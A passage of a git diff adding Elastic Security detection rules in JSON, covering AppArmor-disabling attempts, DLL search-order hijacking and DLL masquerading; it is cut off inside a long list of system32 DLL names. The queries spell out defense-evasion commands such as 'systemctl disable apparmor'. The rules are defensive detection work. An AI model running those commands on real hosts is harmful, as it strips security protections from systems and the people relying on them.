}, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "fa488440-04cc-41d7-9279-539387bf2a17_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json new file mode 100644 index 00000000000..d4d107e7d10 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_4.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of AppArmor", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and event.type == \"start\"\nand (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "fac52c69-2646-4e79-89c0-fd7653461010_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json new file mode 100644 index 00000000000..75343b30d69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_5.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of AppArmor", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "fac52c69-2646-4e79-89c0-fd7653461010_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json new file mode 100644 index 00000000000..c4e6eddba8b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_6.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of AppArmor", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n (process.name == \"systemctl\" and process.args == \"disable\" and process.args == \"apparmor\") or\n (process.name == \"ln\" and process.args : \"/etc/apparmor.d/*\" and process.args == \"/etc/apparmor.d/disable/\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fac52c69-2646-4e79-89c0-fd7653461010", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "fac52c69-2646-4e79-89c0-fd7653461010_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json new file mode 100644 index 00000000000..88000b33bc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as System32 DLL", + "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time <= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", \"acproxy.dll\", \"acspecfc.dll\", \"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", \"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", \"authfwwizfwk.dll\", \"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", \"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", \"cfgmgr32.dll\", \"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", \"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", \"cryptnet.dll\", \"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", \"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", \"dhcpcore6.dll\", \"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", \"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", \"dtsh.dll\", \"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", \"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", 